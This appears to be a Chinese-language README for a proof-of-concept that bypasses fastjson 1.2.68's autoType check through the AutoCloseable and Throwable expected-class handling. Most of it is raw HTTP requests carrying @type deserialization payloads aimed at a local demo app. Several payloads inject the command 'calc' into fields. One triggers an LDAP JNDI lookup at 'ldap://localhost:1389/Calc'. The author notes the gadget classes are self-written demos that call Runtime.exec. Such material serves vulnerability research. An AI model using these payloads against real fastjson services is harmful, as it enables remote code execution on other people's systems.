fastjson-bypass-autotype-1.2.68
fastjson因为exceptClass期望类的特性导致可以通过AutoCloseable和Throwable绕过autotype。
复现
运行org.chabug.fastjson.DemoApplication,访问http://localhost:8082/json
AutoCloseable绕过
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 131
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecCloseable",
"domain": "y4er.com | calc"
}
Throwable绕过
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 127
{
"@type":"java.lang.Exception",
"@type": "org.chabug.fastjson.exploit.ExecException",
"domain": "y4er.com | calc"
}
拓展AutoCloseable绕过 Runnable
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 174
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecRunnable",
"eval":{"@type":"org.chabug.fastjson.exploit.EvalRunnable","cmd":"calc"}
}
Readable
POST /parseObject HTTP/1.1
Host: test.local:8082
Connection: close
Content-Type: application/json
Content-Length: 174
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.ExecReadable",
"eval":{"@type":"org.chabug.fastjson.exploit.EvalReadable","cmd":"calc"}
}
使用$ref拓展攻击面,使用parse()解析的也能触发任意getter。来自于@threedr3am 师傅
POST /parse HTTP/1.1
Host: php.local:8082
Connection: close
Content-Type: application/json
Content-Length: 159
{
"@type":"java.lang.AutoCloseable",
"@type": "org.chabug.fastjson.exploit.RefAnyGetterInvoke",
"resourceName":"ldap://localhost:1389/Calc",
"instance":{"$ref":"$.instance"}
}
说明
用到的org.chabug.fastjson.exploit.ExecException和org.chabug.fastjson.exploit.ExecCloseable都是我自己写的,在其getter中实现了Runtime.getRuntime().exec(),真正要利用还是得自己找到可用的gadget。
另外浅蓝师傅、Kingkk师傅以及l1nk3r师傅的文章中已经说的很明白了,走JNDI注入困难,找找写文件什么的还行,我也还在寻找gadget的过程中,欢迎师傅们加我一起交流。